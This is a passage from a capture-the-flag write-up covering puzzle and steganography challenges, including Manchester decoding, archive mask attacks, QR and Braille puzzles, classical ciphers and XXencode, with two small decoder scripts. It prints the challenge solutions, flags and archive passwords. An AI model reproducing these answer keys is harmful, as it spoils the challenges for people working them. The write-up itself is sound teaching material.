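So it is most likely binary

Convert the binary to ASCII

Result: flag{1_Just_h0pe_mY_deaTh_mAkes_moRe_cEnts_thanmylife}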
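The EE removal, Manchester decoding and binary-to-ASCII steps above in one script, as an added example rather than the challenge author's tooling. It goes slightly beyond the page by trying both Manchester conventions, which is what the mode choice on the online decoder amounts to; the sample is the first five groups of the run.exe output shown above, and the function names are chosen here.

```python
# First five 16-symbol groups of the run.exe output, copied from the page.
# "EE" is the separator the program prints between groups.
SAMPLE = ("0110100101101001EE0110100110100101EE0110100101010110EE"
          "0110100101101010EE0110101010011010")

# Each data bit becomes two half-bit symbols with a transition in the middle.
# hint.png shows 1 -> "10" and 0 -> "01" (the G. E. Thomas convention);
# IEEE 802.3 uses the opposite polarity.
CONVENTIONS = {
    "thomas": {"10": "1", "01": "0"},
    "ieee802.3": {"01": "1", "10": "0"},
}


def strip_separators(raw, separator="EE"):
    """Remove the separator and check that only 0/1 symbols remain."""
    symbols = raw.replace(separator, "").strip()
    stray = set(symbols) - {"0", "1"}
    if stray:
        raise ValueError(f"unexpected characters in input: {sorted(stray)}")
    return symbols


def manchester_decode(symbols, convention="thomas"):
    """Turn a string of half-bit symbols into a string of data bits."""
    table = CONVENTIONS[convention]
    if len(symbols) % 2:
        raise ValueError("odd number of half-bit symbols")
    bits = []
    for i in range(0, len(symbols), 2):
        pair = symbols[i:i + 2]
        if pair not in table:
            # "00" and "11" have no mid-bit transition, so the stream is
            # misaligned or is not Manchester-coded at all.
            raise ValueError(f"invalid pair {pair!r} at offset {i}")
        bits.append(table[pair])
    return "".join(bits)


def bits_to_text(bits):
    """Interpret a bit string as consecutive 8-bit characters."""
    if len(bits) % 8:
        raise ValueError("bit count is not a multiple of 8")
    return bytes(int(bits[i:i + 8], 2)
                 for i in range(0, len(bits), 8)).decode("latin-1")


def decode_output(raw, convention="thomas"):
    """Full pipeline: strip EE, Manchester-decode, convert binary to text."""
    return bits_to_text(manchester_decode(strip_separators(raw), convention))


def printable_candidates(raw):
    """Decode under every convention and keep the printable-ASCII results."""
    found = {}
    for name in CONVENTIONS:
        text = decode_output(raw, name)
        if all(32 <= ord(ch) < 127 for ch in text):
            found[name] = text
    return found


if __name__ == "__main__":
    print(printable_candidates(SAMPLE))
```

Pasting the full run.exe output in place of `SAMPLE` decodes the whole string the same way.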

8、Master Yong's Whimsical Ideas (Hardened Edition 2)

The image carries a blind watermark, which gives information about the password of the image archive

When part of the password is given like this, a mask attack is the usual approach

We have no archive yet, so the image should contain hidden files

Two archives are carved out

Run a mask attack on the archive that contains images

This gives the password snert2024

Extracting the archive with the password gives three image files

hint.jpg contains a barcode

Just scan it

rabbit key from chessboard

That is, the Rabbit key comes from the chessboard (there is an encryption scheme called Rabbit)

half.jpg is half of a QR code

There is also touch.gif

Something like gomoku pieces can be seen sliding past

The usual way to handle an animated image is to split it into frames and then stitch them together:

You can write a script or use an online site

Next, find a site for merging images:

The animation moves from right to left, so merge horizontally

Download the merged image

It looks like gomoku, but it is actually Braille: the file is named touch, telling you to touch rather than look, and Braille is read by touch

A quick comparison against a chart:

braille (which is exactly the English word for this writing system)

Recall the earlier hint: the Rabbit key comes from the chessboard

So the word braille should be the key for some Rabbit ciphertext

But we have no ciphertext yet (though the other archive does contain a secret.txt)

The other archive is encrypted, so we must have missed something earlier

Keep testing: a png image can be carved out of half.jpg, and it is exactly the other half of the QR code

Look closely, though: the finder patterns differ in colour

They are exactly inverted, so just invert the colours of one half and stitch the two together

Invert the colours of the right half

Stitch

Scan

U2FsdGVkX1+rigzBYkaG0L8K9/jNCHhnwmPWbBCvUW0=

Presumably this is the Rabbit encryption mentioned earlier

Decryption succeeds, giving: Quetoutaillebien

This password opens the other archive

The archive inside is encrypted again, so look at the txt file first

From their patterns, the former can be identified as Vigenère encryption, and the latter, the key, as a pawnshop cipher (当铺密码):

First solve the key:

741585369

15853

24862

7415963

Mapping the digits onto a phone keypad gives the corresponding letters:

MYON

Vigenère-decrypt the ciphertext with it:

Result: thisispassword

Extract the archive with the password

Blue plane 0 of the image contains a QR code

Decoding gives key:n0thingimp0rtant

Use the key to open the name archive

Open the Word document

It says there is a list of names, but nothing is visible

Tick "Hidden text" in the options

Something new appears

Adjust the font colour

Result:

Quincy
Frank
david
lucas
Miles
William
Matthew
wyatt
Tyler
Wesley
Vaughn
flynn
Vance
Daniel
Blake
felix
Uriah
0scar
5tephen
Frederick
Ulric
leo
Quentin
=liot

This is an acrostic; from the character set it can be identified as base64

Take the first character of each name to get the ciphertext:

QFdlMWMwTWVfVDBfU05FUlQ=

Decoding gives:

@We1c0Me_T0_SNERT

Extract flag.zip with the password

Hidden information is present:

cNalVNrhNA5JTPJJnJ3x0Lo3TRn-mPJxdPZxNA4t5QpxnR1-hMKBcTE++

Decode it as XXencode

Flag: flag{Y0u_mUsT_B_A_w0rm_in_Y0nGs_st0mach}
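An XXencode decoder for the hidden string, added here as an example and not taken from the original post, which used an online tool. The input is the string from flag.zip shown above; `xxdecode_line` and `xxdecode` are names chosen here.

```python
# XXencode maps 6-bit values onto this 64-character alphabet. The first
# character of every line encodes how many decoded bytes the line carries.
XX_ALPHABET = ("+-0123456789"
               "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
               "abcdefghijklmnopqrstuvwxyz")

# Hidden string recovered from flag.zip, copied from the page.
SAMPLE = "cNalVNrhNA5JTPJJnJ3x0Lo3TRn-mPJxdPZxNA4t5QpxnR1-hMKBcTE++"


def xxdecode_line(line):
    """Decode one XXencoded line: a length character, then 4-character groups."""
    try:
        values = [XX_ALPHABET.index(ch) for ch in line]
    except ValueError:
        raise ValueError("character outside the XXencode alphabet") from None
    if not values:
        raise ValueError("empty line")
    length, body = values[0], values[1:]
    if len(body) % 4:
        raise ValueError("body length is not a multiple of 4")

    out = bytearray()
    for i in range(0, len(body), 4):
        a, b, c, d = body[i:i + 4]
        # Four 6-bit values are repacked into three 8-bit bytes.
        out.append((a << 2) | (b >> 4))
        out.append(((b & 0x0F) << 4) | (c >> 2))
        out.append(((c & 0x03) << 6) | d)
    if length > len(out):
        raise ValueError("length character claims more bytes than are present")
    # The last group is padded, so cut back to the declared length.
    return bytes(out[:length])


def xxdecode(text):
    """Decode XXencoded text, with or without the begin/end framing lines."""
    data = bytearray()
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("begin ") or line == "end":
            continue
        data += xxdecode_line(line)
    return bytes(data)


if __name__ == "__main__":
    print(xxdecode(SAMPLE).decode("ascii"))
```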
